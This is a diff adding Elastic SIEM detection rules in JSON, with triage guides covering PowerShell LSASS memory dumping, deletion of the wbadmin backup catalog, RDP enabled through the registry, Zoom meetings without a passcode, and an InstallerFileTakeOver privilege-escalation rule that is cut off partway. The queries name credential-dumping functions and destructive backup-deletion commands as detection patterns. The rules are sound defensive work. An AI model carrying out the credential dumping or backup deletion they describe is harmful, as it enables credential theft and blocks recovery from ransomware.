b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_108.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects PowerShell scripts capable of dumping process memory using WindowsErrorReporting or Dbghelp.dll MiniDumpWriteDump. Attackers can use this tooling to dump LSASS and get access to credentials.", + "false_positives": [ + "PowerShell scripts that use this capability for troubleshooting." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell MiniDump Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell MiniDump Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse Process Memory Dump capabilities to extract credentials from LSASS or to obtain other privileged information stored in the process memory.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to dump process memory, making false positives unlikely.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and powershell.file.script_block_text:(MiniDumpWriteDump or MiniDumpWithFullMemory or pmuDetirWpmuDiniM) and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1", + "https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-ProcessMiniDump.ps1", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "577ec21e-56fe-4065-91d8-45eb8224fe77", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "577ec21e-56fe-4065-91d8-45eb8224fe77_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_110.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_110.json new file mode 100644 index 00000000000..dac0cc37dee --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_110.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Deleting Backup Catalogs with Wbadmin", + "note": "## Triage and analysis\n\n### Investigating Deleting Backup Catalogs with Wbadmin\n\nWindows Server Backup stores the details about your backups (what volumes are backed up and where the backups are located) in a file called a backup catalog, which ransomware victims can use to recover corrupted backup files. Deleting these files is a common step in threat actor playbooks.\n\nThis rule identifies the deletion of the backup catalog using the `wbadmin.exe` utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- Administrators can use this command to delete corrupted catalogs, but overall the activity is unlikely to be legitimate.\n\n### Related rules\n\n- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- If any backups were affected:\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"wbadmin.exe\" or ?process.pe.original_file_name == \"WBADMIN.EXE\") and\n process.args : \"catalog\" and process.args : \"delete\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + }, + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "581add16-df76-42bb-af8e-c979bfb39a59_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_111.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_111.json new file mode 100644 index 00000000000..025d9f1345f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_111.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Deleting Backup Catalogs with Wbadmin", + "note": "## Triage and analysis\n\n### Investigating Deleting Backup Catalogs with Wbadmin\n\nWindows Server Backup stores the details about your backups (what volumes are backed up and where the backups are located) in a file called a backup catalog, which ransomware victims can use to recover corrupted backup files. Deleting these files is a common step in threat actor playbooks.\n\nThis rule identifies the deletion of the backup catalog using the `wbadmin.exe` utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- Administrators can use this command to delete corrupted catalogs, but overall the activity is unlikely to be legitimate.\n\n### Related rules\n\n- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- If any backups were affected:\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"wbadmin.exe\" or ?process.pe.original_file_name == \"WBADMIN.EXE\") and\n process.args : \"catalog\" and process.args : \"delete\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + }, + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "581add16-df76-42bb-af8e-c979bfb39a59_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_110.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_110.json new file mode 100644 index 00000000000..c1a64b88f3d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_110.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "RDP Enabled via Registry", + "note": "## Triage and analysis\n\n### Investigating RDP Enabled via Registry\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other computers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access victim servers, often using privileged accounts.\n\nThis rule detects modification of the fDenyTSConnections registry key to the value `0`, which specifies that remote desktop connections are enabled. Attackers can abuse remote registry, use psexec, etc., to enable RDP and move laterally.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user should be performing this kind of activity, whether they are aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it using firewall rules:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and \n event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Terminal Server\\\\fDenyTSConnections\" and\n registry.data.strings : (\"0\", \"0x00000000\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\SystemPropertiesRemote.exe\", \n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\", \n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesAdvanced.exe\", \n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\", \n \"?:\\\\Windows\\\\WinSxS\\\\*\\\\TiWorker.exe\", \n \"?:\\\\Windows\\\\system32\\\\svchost.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_111.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_111.json new file mode 100644 index 00000000000..a94bcd8c4be --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_111.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "RDP Enabled via Registry", + "note": "## Triage and analysis\n\n### Investigating RDP Enabled via Registry\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other computers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access victim servers, often using privileged accounts.\n\nThis rule detects modification of the fDenyTSConnections registry key to the value `0`, which specifies that remote desktop connections are enabled. Attackers can abuse remote registry, use psexec, etc., to enable RDP and move laterally.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user should be performing this kind of activity, whether they are aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it using firewall rules:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and \n event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Terminal Server\\\\fDenyTSConnections\" and\n registry.data.strings : (\"0\", \"0x00000000\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\SystemPropertiesRemote.exe\", \n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\", \n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesAdvanced.exe\", \n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\", \n \"?:\\\\Windows\\\\WinSxS\\\\*\\\\TiWorker.exe\", \n \"?:\\\\Windows\\\\system32\\\\svchost.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_103.json b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_103.json new file mode 100644 index 00000000000..474d90a8e9e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_103.json @@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies Zoom meetings that are created without a passcode. Meetings without a passcode are susceptible to Zoombombing. Zoombombing is carried out by taking advantage of Zoom sessions that are not protected with a passcode. Zoombombing refers to the unwanted, disruptive intrusion, generally by Internet trolls and hackers, into a video conference call. In a typical Zoombombing incident, a teleconferencing session is hijacked by the insertion of material that is lewd, obscene, racist, or antisemitic in nature, typically resulting of the shutdown of the session.", + "index": [ + "filebeat-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Zoom Meeting with no Passcode", + "query": "event.type:creation and event.module:zoom and event.dataset:zoom.webhook and\n event.action:meeting.created and not zoom.meeting.password:*\n", + "references": [ + "https://blog.zoom.us/a-message-to-our-users/", + "https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "zoom.meeting.password", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "58ac2aa5-6718-427c-a845-5f3ac5af00ba", + "setup": "## Setup\n\nThe Zoom Filebeat module or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Zoom", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "58ac2aa5-6718-427c-a845-5f3ac5af00ba_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_110.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_110.json new file mode 100644 index 00000000000..580a12e7113 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_110.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via InstallerFileTakeOver", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' 